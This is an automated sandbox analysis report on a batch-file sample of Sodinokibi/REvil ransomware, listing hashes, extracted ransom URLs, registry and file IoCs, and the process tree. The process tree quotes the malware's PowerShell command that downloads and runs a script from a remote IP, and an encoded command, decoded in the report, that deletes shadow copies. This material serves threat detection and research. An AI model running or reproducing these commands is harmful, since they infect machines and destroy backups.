Analysis

- max time kernel: 145s
- max time network: 73s
- platform: windows7_x64
- resource: win7v200430
- submitted: 15-05-2020 19:19
Tasks

- Static task: static1
- Behavioral task: behavioral1
  Sample: 55022f44a9c2dac0916e9db3842398df.bat
  Resource: win7v200430
- Behavioral task: behavioral2
  Sample: 55022f44a9c2dac0916e9db3842398df.bat
  Resource: win10v200430
General

- Target: 55022f44a9c2dac0916e9db3842398df.bat
- Size: 219B
- MD5: 07ea4461f7fc0758bb7fb455966df5d9
- SHA1: 2df15ea78ad89a7816a69bab5656274115bed854
- SHA256: dd540cd255b16f023dee940fffa52d054726d7f2c1c9aeaeafc4f594a3e2a5f1
- SHA512: b0ea53a6359157114b09bddf227d1bfedcd7db302c356e99e1086b736fc003b6a2f40647a6feecf6f5642104bbf8e7b9a49668c29a5f1c0857fcf1538419414d
Malware Config

Extracted
  URL: http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df

Extracted
  Path: C:\8hf7h555kv-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A44A9E362E12D1C0
    http://decryptor.cc/A44A9E362E12D1C0
Signatures

Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow | pid  | process
  1    | 1328 | powershell.exe
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\887958rj9j7e4.bmp" | powershell.exe
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe
  pid  | process
  1328 | powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  description | pid | process | target process
  PID 1296 wrote to memory of 1328 | 1296 | cmd.exe | powershell.exe
  PID 1328 wrote to memory of 112 | 1328 | powershell.exe | powershell.exe
  PID 1328 wrote to memory of 112 | 1328 | powershell.exe | powershell.exe
  PID 1328 wrote to memory of 112 | 1328 | powershell.exe | powershell.exe
  PID 1328 wrote to memory of 112 | 1328 | powershell.exe | powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeDebugPrivilege | 1328 | powershell.exe
  Token: SeDebugPrivilege | 1328 | powershell.exe
  Token: SeDebugPrivilege | 112 | powershell.exe
  Token: SeBackupPrivilege | 760 | vssvc.exe
  Token: SeRestorePrivilege | 760 | vssvc.exe
  Token: SeAuditPrivilege | 760 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 1328 | powershell.exe
Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe, powershell.exe
  pid  | process
  1328 | powershell.exe
  112  | powershell.exe
  (the listed IoCs are repeated entries for these two processes, almost all of them 1328 powershell.exe)
Drops file in Program Files directory (15 IoCs)
  Processes: powershell.exe
  description | ioc | process
  File created | \??\c:\program files\microsoft sql server compact edition\8hf7h555kv-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\PushExit.eps | powershell.exe
  File opened for modification | \??\c:\program files\ReceiveRestart.m4v | powershell.exe
  File opened for modification | \??\c:\program files\SuspendSync.aifc | powershell.exe
  File created | \??\c:\program files (x86)\8hf7h555kv-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\EnterEnable.mpv2 | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\8hf7h555kv-readme.txt | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\8hf7h555kv-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\CompleteRepair.vbe | powershell.exe
  File opened for modification | \??\c:\program files\SkipRequest.raw | powershell.exe
  File opened for modification | \??\c:\program files\CheckpointNew.3gp | powershell.exe
  File opened for modification | \??\c:\program files\ProtectUnblock.mpg | powershell.exe
  File created | \??\c:\program files\8hf7h555kv-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\AddSplit.png | powershell.exe
  File opened for modification | \??\c:\program files\LimitInstall.emf | powershell.exe
Processes

C:\Windows\system32\cmd.exe (PID 1296)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\55022f44a9c2dac0916e9db3842398df.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1328)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df');Invoke-PJRBBLOXXKAL;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in Program Files directory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 112)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe (PID 760)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken